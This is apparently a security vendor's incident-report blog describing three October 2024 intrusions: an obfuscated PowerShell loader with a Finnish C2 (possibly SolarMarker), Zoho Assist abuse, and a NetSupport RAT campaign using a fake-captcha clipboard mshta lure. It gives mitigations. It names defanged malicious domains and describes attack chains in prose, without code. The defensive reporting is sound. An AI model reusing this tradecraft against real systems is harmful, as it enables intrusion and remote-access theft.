A Deep Dive into Recent Obfuscated PowerShell, Zoho Assist, and NetSupport RAT Attacks

Between October 16-23, 2024, Blackpoint’s Security Operations Center (SOC) responded to 602total incidents across on-premises, Microsoft 365, and Google Workspace protected environments. Three incidents we will cover this week involved many tools, but of interest are confirmed or likely threat actor use of:

• Obfuscated PowerShell for execution.
• Zoho Assist likely for persistence.
• NetSupport remote access trojan (RAT) campaign likely for persistence.

In this blog, we’ll dive into the details of three select incidents, why they matter for our partners, and possible mitigations using your existing tech stack alongside Blackpoint Cyber’s managed services.

Topline Takeaways

• Industry target: Government
• Attacker methods:
  • Obfuscated PowerShell
  • Linux C2 hosted in Finland
  • Potential SolarMarker
• Recommended mitigations:
  • Require the use of secure password managers.
  • Employ least-privilege access controls.
  • Implement strict controls on the use of scripting languages.

Incident Timeline for 2024-10-16

Blackpoint’s MDR technology alerted to obfuscated PowerShell on a device of a government partner. Blackpoint’s Active SOC isolated the impacted device and contacted the partner to inform them of the incident.

Initial investigation into the incident revealed that the obfuscated PowerShell first initialized a new Advanced Encryption Standard (AES) Encryption Service Provider Object and then set the AES Encryption Key. Once both the AES object and Key were created, it set the Initialization Vector. With the prerequisites set, default encrypted registry values located at HKCU:\Software\Classes\ were retrieved. Then using the previously set AES key and IV key, the PowerShell decoded those values and then loaded and executed the data into memory.

Further investigation revealed a malicious PowerShell callout to a Linux command and control (C2) hosted in Finland. While Blackpoint’s SOC was unable to validate the malware due to quick response and isolation, the activity aligns with a possible SolarMarker infection.

More About SolarMarker

SolarMarker is written in .NET, possesses a backdoor and information stealing capability, and has been active since 2021. SolarMarker has previously been reported to encrypt its traffic to C2 servers using hard-coded RSA keys and a symmetric AES CBC algorithm; data is often exfiltrated in a JSON format to the attackers C2 server.

The threat actor behind the SolarMarker malware has consistently made changes and improvements to avoid takedown and detection methods, making SolarMarker an attractive and competitive malware operation.

APG Threat Analysis for SolarMarker

Blackpoint’s Adversary Pursuit Group (APG) predicts the continued deployment of the SolarMarker malware to target organizations across all verticals over the next 12 months. This assessment is supported by the observation of similar incidents involving our partner in healthcare on April 05, 2024 and external reports related to the deployment of SolarMarker.

Mitigations

• Require the use of secure password managers to make accessing passwords by threat actors more difficult.
• Employ least-privilege access controls to ensure that users only have access to the data and resources required to complete their job functions.
• Implement strict controls on the use of scripting languages, as threat actors rely on scripting languages to deploy malware and conduct malicious activities.

Topline Takeaways

• Industry target: Industrials
• Attacker methods:
  • Zoho Assikst
  • Google Chrome
• Recommended mitigations:
  • Provide a dedicated software center.
  • Implement application controls.
  • Regularly audit both environment and endpoints.

Incident Timeline for 2024-10-17

On October 17, 2024, Blackpoint’s MDR technology alerted to the execution of Zoho Assist on the host of an Industrials partner. Blackpoint’s Active SOC isolated the impacted device and contacted the partner to provide information on the incident.

Initial investigation into the incident found that Zoho Assist was downloaded via Google Chrome. Blackpoint’s SOC identified network callouts from agent.exe and ZAAudioClient.exe. Blackpoint’s SOC’s quick response and isolation of affected devices prevented any additional malicious activity.

More About Zoho Assist

Zoho Assist is a remote support and access software that provides users with remote access to control devices. Zoho Assist can be deployed on Windows, Mac, Linux, Chromebook, Android, and iOS devices making the tool an attractive tool for organizations.

Blackpoint’s APG has tracked at least 5 advanced persistent threat (APT) groups and 6 ransomware operations that have been reported to utilize Zoho Assist. Threat actors have often been observed deploying Zoho Assist to maintain persistent access on target networks. Zoho Assist has also been used by scammers purporting to offer remote support and attempting to get a targeted victim to install the tool under the guise that a legitimate support employee needs to access a device to correct the “problem”. Due to the wide array of platforms available to target and the potential for blending into “normal” traffic likely increases the attractiveness of this tool.

APG Threat Analysis for Zoho Assist

Threat actors will likely continue to utilize legitimate tools, such as Zoho Assist, for persistent access to victim organizations over the next 12 months. Incidents involving financials and industrials partners in March 2024 supports this assessment.

Mitigations

• Dedicated Software Center: Ensure employees only download software from monitored, approved sources.
• Implement Managed Application Control (MAC) for continuous monitoring and blocking of unapproved software.
• Regularly audit both environment and endpoints to identify potential rogue applications and potential old/unused accounts that should be removed.

Topline Takeaways

• Industry target: Institutions & Organizations
• Attacker methods:
  • Social engineering for initial access
  • NetSupport RAT
  • .html initial file
• Recommended mitigations:
  • Create and implement employee security training.
  • Require the use of multi-factor authentication (MFA).
  • Use strong, unique passwords.

Incident Timeline for 2024-10-22

Blackpoint’s MDR technology alerted to execution of mshta.exe on the host of an institutions & organizations partner. Analysis into the incident identified files associated with the NetSupport RAT. Blackpoint’s SOC responded to this incident based on the execution of mshta.exe and was able to isolate the affected host, preventing lateral movement or any additional malicious activity.

Initial investigation identified that the remote execution of mshta.exe was tied to an .html file hosted at “hxxps://holidaybunch[.]com/”, which has been linked to a NetSupport RAT campaign. The domain prompts the user with a Cloudflare captcha and then JavaScript within the .html auto copies mshta command into the clipboard that downloads and executes NetSupport RAT.

Additional analysis identified obfuscated PowerShell downloaded a .png file from another domain, “hxxp[://]traversecityspringbreak[.]com”. This file was executed in memory via Invoke Expression (IEX). After the execution the DNS cache of the host was flushed and a newly created directory “HVporg” located at C:\Users\$username\AppData\Roaming\HVpOrg was hidden via “attrib”.

More About NetSupport RAT

NetSupport RAT is a legitimate remote support tool that is frequently abused by threat actors for illicit purposes. NetSupport RAT can transfer files, provide persistent remote access, perform keylogging, and control system resources.

Due to the widespread use and availability for both malicious and legitimate use cases, the use of NetSupport RAT cannot be attributed to a single threat actor/group. This widespread use of NetSupport RAT leads to a variety of initial access methods; however, social engineering appears to remain a top choice for deploying NetSupport RAT.

APG Threat Analysis for NetSupport RAT

Blackpoint’s APG predicts that threat actors will likely continue to use NetSupport RAT for persistence over the next 12 months. This is supported by previous incidents involving an industrials partner in May 2024 and a healthcare and consumer non-cyclicals partners in June 2024.

Mitigations

• Create and implement employee security training that includes how to spot signs of a phishing email and when and how to report suspicious emails to an incident response authority.
• Require the use of MFA to make the use of compromised credentials harder by providing an additional layer of authentication.
• Strong Password Policies: Implement unique, strong passwords and rotate them regularly.

These incidents underscore the evolving tactics of threat actors and highlight the importance of layered defenses. By leveraging Blackpoint’s MDR technology and following these mitigation strategies, you can bolster your organization’s defenses against these types of attacks. Reach out to Blackpoint’s SOC team for tailored recommendations on how to enhance your cybersecurity posture.